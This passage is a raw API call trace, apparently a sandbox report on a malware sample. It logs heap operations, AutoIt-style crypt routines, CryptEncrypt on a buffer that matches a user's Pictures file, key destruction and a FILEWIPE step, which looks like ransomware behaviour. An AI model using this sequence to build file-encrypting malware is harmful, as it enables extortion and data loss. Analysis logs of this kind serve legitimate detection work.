Size=0x10) returned 0x8891d8 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0040.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.456] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.456] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0040.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0040.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0040.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0040.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0040.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0040.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0040.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0040.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0040.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0040.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0040.460] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da218, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da218*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0040.460] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.460] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.460] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.460] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.460] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.460] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.460] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.460] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.460] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0040.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.460] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.460] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.460] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.460] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.460] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.460] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.460] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.461] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0040.461] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.461] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.461] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x14eb0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x14ec0) returned 1 [0040.462] CharLowerBuffW (in: lpsz="byte[85697]", cchLength=0xb | out: lpsz="byte[85697]") returned 0xb [0040.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.466] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95ed78*, pdwDataLen=0x6ae220*=0x14eb0, dwBufLen=0x14ec0 | out: pbData=0x95ed78*, pdwDataLen=0x6ae220*=0x14ec0) returned 1 [0040.469] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0040.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.483] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0040.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.483] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.484] CryptDestroyKey (hKey=0x7c2280) returned 1 [0040.484] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.484] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.484] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.484] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.484] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.484] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0040.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0040.484] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0040.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0040.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.485] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0040.485] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.485] FreeLibrary (hLibModule=0x754b0000) returned 1 [0040.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0040.486] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0040.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0040.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.486] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf77fd840, ftCreationTime.dwHighDateTime=0x1d5bf74, ftLastAccessTime.dwLowDateTime=0x6bebefd0, ftLastAccessTime.dwHighDateTime=0x1d5bcb3, ftLastWriteTime.dwLowDateTime=0x6bebefd0, ftLastWriteTime.dwHighDateTime=0x1d5bcb3, nFileSizeHigh=0x0, nFileSizeLow=0x14eb0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="VyeRic.png", cAlternateFileName="")) returned 0x7c2240 [0040.486] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0040.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.487] CharLowerBuffW (in: lpsz="byte[85680]", cchLength=0xb | out: lpsz="byte[85680]") returned 0xb [0040.487] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0040.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.487] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0040.487] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0040.488] FreeLibrary (hLibModule=0x76b40000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 